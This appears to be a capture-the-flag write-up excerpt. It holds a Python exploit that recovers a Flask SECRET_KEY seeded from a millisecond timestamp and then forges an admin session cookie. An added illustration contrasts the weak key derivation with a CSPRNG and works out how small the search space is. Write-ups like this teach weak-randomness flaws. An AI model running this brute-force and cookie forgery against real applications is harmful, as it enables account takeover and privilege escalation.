The writeup is at the URL below.
Here is the final exploit that I use to brute-force SECRET_KEY:

```python
import random
import sys
# session.py is the challenge's own helper module (not reproduced here);
# it exposes the same verify/decode/sign operations as the Flask session cookie.
from session import verify, decode, sign

# Cookie captured from a normal (non-admin) login; the key that verifies it is the target.
session = "eyJhZG1pbiI6bnVsbCwidWlkIjoiYSJ9.Y8NJdQ.t-Orpm8NJN1OcTRqzI1SJsx_hks"

# Check verify method
#print(verify("eyJsb2dnZWRfaW4iOnRydWV9.XDuW-g.cPCkFmmeB7qNIcN-ReiN72r0hvU", "CHANGEME"))

# Bruteforce: the app seeds random() with a millisecond timestamp (plus a
# fixed offset) when it generates SECRET_KEY, so the candidate window is
# only ~100 s * 1000 = ~100k seeds.
start = 1673737312
# 1673737412
end = 1673737415
SECRET_OFFSET = -67198624

while start < end:
    # Re-round every iteration so float drift from += 0.001 does not skip seeds.
    start = round(start, 3)
    random.seed(round((start + SECRET_OFFSET) * 1000))
    # 32 hex digits; hex() returns e.g. "0xa", so strip the prefix.
    key = "".join([hex(random.randint(0, 15)) for x in range(32)]).replace("0x", "")
    print(start)

    if verify(session, key) == True:
        #key = "e897071bf3d5dc6ff7882fc0b64ece5c"
        print("===" * 20)
        print(sign({'admin': True, 'uid': 'a'}, key))
        sys.exit(0)

    start += 0.001
```
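Added illustration, not part of the original writeup or the challenge code: the timestamp-seeded key derivation the exploit above relies on, as a function, beside a CSPRNG-based replacement, plus a helper that sizes the search window the weak derivation leaves. The offset and window values are the ones from the exploit; the function names are assumptions.

```python
import math
import random
import secrets

# 32 hex nibbles = 128-bit key, the length the challenge's derivation produces.
KEY_NIBBLES = 32


def derive_key_weak(timestamp: float, offset: int = 0) -> str:
    """The derivation the exploit assumes: seed Python's Mersenne Twister with a
    millisecond timestamp (plus a fixed offset) and draw 32 hex digits.
    Anyone who knows the timestamp to the millisecond gets the same key."""
    random.seed(round((timestamp + offset) * 1000))
    # hex(n) gives e.g. "0xa"; [2:] drops the prefix, same as the .replace("0x", "") above.
    return "".join(hex(random.randint(0, 15))[2:] for _ in range(KEY_NIBBLES))


def derive_key_secure() -> str:
    """Hardened form: 16 bytes from the OS CSPRNG, hex-encoded to 32 chars."""
    return secrets.token_hex(KEY_NIBBLES // 2)


def candidate_space(start: float, end: float, resolution_ms: int = 1) -> int:
    """Seeds an attacker must try if the key is known to have been generated
    between `start` and `end` (Unix seconds) at the given timestamp resolution."""
    return int(round((end - start) * 1000)) // resolution_ms


def effective_entropy_bits(start: float, end: float, resolution_ms: int = 1) -> float:
    """Bits of uncertainty in the weak key, versus the 128 bits its length suggests."""
    return math.log2(candidate_space(start, end, resolution_ms))


def is_deterministic(timestamp: float) -> bool:
    """The property that makes the brute force work: same timestamp, same key."""
    return derive_key_weak(timestamp) == derive_key_weak(timestamp)


if __name__ == "__main__":
    # Window used in the exploit above: 103 s -> 103,000 candidate seeds (~16.7 bits).
    print(candidate_space(1673737312, 1673737415), effective_entropy_bits(1673737312, 1673737415))
    print(derive_key_weak(1673737312.000, offset=-67198624))
    print(derive_key_secure())
```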

Original writeup (https://albertofdr.github.io/post/ctf-idek-2023/).